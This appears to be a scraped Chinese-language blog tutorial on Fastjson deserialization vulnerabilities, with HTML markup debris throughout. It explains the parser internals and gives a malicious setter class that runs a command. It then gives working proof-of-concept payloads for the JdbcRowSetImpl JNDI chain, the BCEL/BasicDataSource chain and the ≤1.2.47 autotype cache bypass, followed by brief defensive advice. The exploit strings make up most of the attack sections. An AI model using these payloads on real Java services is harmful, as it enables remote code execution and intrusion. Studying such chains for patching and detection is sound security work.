Fastjson反序列化漏洞分析与利用<\/h1>

1. Fastjson基础流程分析<\/h2>

Fastjson将字符串转化为Java对象本质上是一个反序列化的过程：<\/p>

字符串解析阶段<\/strong>：<\/p>

在DefaultJSONParser<\/code>类中将字符串进行分割<\/li>
在ParseConfig<\/code>类中通过getDeserializer<\/code>获取反序列化器<\/li> <\/ul> <\/li>
自定义类处理<\/strong>：<\/p> 对于自定义类，Fastjson会认为是JavaBean对象<\/li> 通过createJavaBeanDeserializer<\/code>方法进行反序列化<\/li> 默认开启asmEnable<\/code>，使用asmFactory.createJavaBeanDeserializer<\/code><\/li> <\/ul> <\/li> 关键调试技巧<\/strong>：<\/p> 在类中添加Map<\/code>属性并提供get<\/code>方法可使asmEnable<\/code>置为false<\/li> 便于调试进入JavaBeanDeserializer<\/code>类<\/li> <\/ul> <\/li> 方法调用机制<\/strong>：<\/p> FieldInfo<\/code>类通过反射调用get\/set方法<\/li> 示例中Map<\/code>属性无set方法时，会调用get方法<\/li> <\/ul> <\/li> <\/ol> 2. 基础利用实验<\/h2> 2.1 测试类示例<\/h3> public<\/span> class<\/span> Person<\/span> {<\/span> <\/span><\/span> private<\/span> String name;<\/span> <\/span><\/span> private<\/span> int<\/span> age;<\/span> <\/span><\/span> private<\/span> Map map;<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造方法省略 <\/span><\/span><\/span><\/span> <\/span><\/span> public<\/span> Map getMap<\/span>()<\/span> {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"调用getMap方法"<\/span>);<\/span> <\/span><\/span> return<\/span> map;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 其他getter\/setter省略 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2.2 测试代码<\/h3> public<\/span> class<\/span> JSONUser<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> String s =<\/span> "{\"@type\":\"Person\",\"name\":\"aaa\",\"age\":\"12\",\"map\":{}}"<\/span>;<\/span> <\/span><\/span> final<\/span> JSONObject parse =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>s);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>parse);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2.3 恶意类示例<\/h3> public<\/span> class<\/span> Test<\/span> {<\/span> <\/span><\/span> private<\/span> String cmd;<\/span> <\/span><\/span> <\/span><\/span> public<\/span> void<\/span> setCmd<\/span>(<\/span>String cmd)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. Fastjson攻击链分析<\/h2> 3.1 JdbcRowSetImpl攻击链（出网利用）<\/h3> 限制条件<\/strong>：<\/p> 版本限制<\/li> 依赖限制<\/li> 需要出网<\/li> <\/ul> 利用原理<\/strong>：<\/p> JdbcRowSetImpl<\/code>类存在JNDI注入漏洞<\/li> 满足Fastjson反序列化条件：属性为public<\/li> 或有set方法<\/li> 或为Map\/Collection\/Atomic类型<\/li> <\/ul> <\/li> <\/ol> 关键调用链<\/strong>：<\/p> setAutoCommit<\/code> -> connect<\/code> -> JNDI注入<\/li> <\/ul> POC示例<\/strong>：<\/p> public<\/span> class<\/span> FastJsonRowSetImpl<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> String s =<\/span> "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"DataSourceName\":\"rmi:\/\/localhost:1099\/remoteObj\",\"autoCommit\":true}"<\/span>;<\/span> <\/span><\/span> JSON.<\/span>parseObject<\/span>(<\/span>s);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.2 BCEL攻击链（不出网利用）<\/h3> 利用原理<\/strong>：<\/p> BCEL类中的ClassLoader<\/code>有loadClass<\/code>方法<\/li> 当类名以`<\/li> <\/ol> \[BCEL \]<\/span><\/p> `开头时会创建该类<\/p> 关键类<\/strong>：<\/p> BasicDataSource<\/code>中的createConnectionFactory<\/code>方法<\/li> 最终通过getConnection<\/code>触发<\/li> <\/ul> POC示例<\/strong>：<\/p> public<\/span> class<\/span> FastJsonBCEL<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> byte<\/span>[]<\/span> classBytes =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"evil.class"<\/span>));<\/span> <\/span><\/span> final<\/span> String code =<\/span> Utility.<\/span>encode<\/span>(<\/span>classBytes,<\/span> true<\/span>);<\/span> <\/span><\/span> <\/span><\/span> String s =<\/span> "{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassName\":\" <\/span><\/span><\/span>$$ <\/span><\/span><\/span>BCEL <\/span><\/span><\/span>$$ <\/span><\/span><\/span>"<\/span>+<\/span>code+<\/span>"\",\"driverClassLoader\":{\"@type\":\"sun.org.apache.bcel.internal.util.ClassLoader\"}}"<\/span>;<\/span> <\/span><\/span> JSON.<\/span>parseObject<\/span>(<\/span>s);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4. Fastjson ≤1.2.47利用链<\/h2> 4.1 版本限制绕过<\/h3> 绕过原理<\/strong>：<\/p> Fastjson 1.2.25+增加了autotype检测<\/li> 利用缓存机制绕过： TypeUtils.getClassFromMapping<\/code>从缓存中查找类<\/li> 通过TypeUtils.loadClass<\/code>加载恶意类到缓存<\/li> <\/ul> <\/li> <\/ol> POC示例<\/strong>：<\/p> public<\/span> class<\/span> fastjson_1247<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> String s =<\/span> "{{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"DataSourceName\":\"rmi:\/\/localhost:1099\/remoteObj\",\"autoCommit\":true}}"<\/span>;<\/span> <\/span><\/span> JSON.<\/span>parseObject<\/span>(<\/span>s);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5. 防御建议<\/h2> 升级到最新安全版本<\/li> 关闭autotype功能<\/li> 使用白名单机制限制反序列化类<\/li> 对输入进行严格过滤<\/li> <\/ol> 6. 总结<\/h2> Fastjson反序列化漏洞的核心在于：<\/p> 通过@type<\/code>指定恶意类<\/li> 利用类中的getter\/setter方法或特定属性触发漏洞<\/li> 结合JNDI、BCEL等机制实现RCE<\/li> 高版本通过缓存机制绕过autotype检测<\/li> <\/ul>